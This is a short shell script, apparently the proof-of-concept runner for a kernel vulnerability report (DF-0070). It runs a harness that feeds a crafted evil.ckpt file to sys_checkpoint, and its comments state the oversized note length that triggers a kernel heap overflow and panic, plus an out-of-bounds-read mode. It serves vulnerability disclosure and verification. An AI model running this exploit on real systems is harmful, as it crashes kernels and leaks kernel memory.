DF-0070 / run.sh
#!/bin/sh
# DF-0070 PoC runner -- the exact invocation used when the report was verified.
#
# Runs the df0070 harness against evil.ckpt in the requested mode and prints
# RUN_OK only when the harness exits 0 (set -e aborts on any failure).
#
# Modes (first argument, default "panic"):
#   panic  builds evil.ckpt and hands it to sys_checkpoint(CKPT_THAW); the
#          crafted n_namesz=0x10000000 makes elf_getnote's bcopy run 256 MB
#          past its kmalloc(880) note buffer into unmapped KVM, so the kernel
#          panics (Fatal trap 12 page fault in memmove/bcopy).
#   leak   slab-adjacent 116-byte out-of-bounds read; usually just EINVAL.
#
# sys_checkpoint is gated by ckptgroup (default 0 = wheel), so run as root.
#
# Usage: ./run.sh [panic|leak]
set -e

# Work from the script's own directory so df0070 and evil.ckpt resolve
# regardless of the caller's cwd.
cd "$(dirname "$0")"

mode=${1:-panic}

# Echo the command line before running it so the log shows the exact mode.
echo "+ ./df0070 evil.ckpt $mode"
./df0070 evil.ckpt "$mode"
echo "RUN_OK"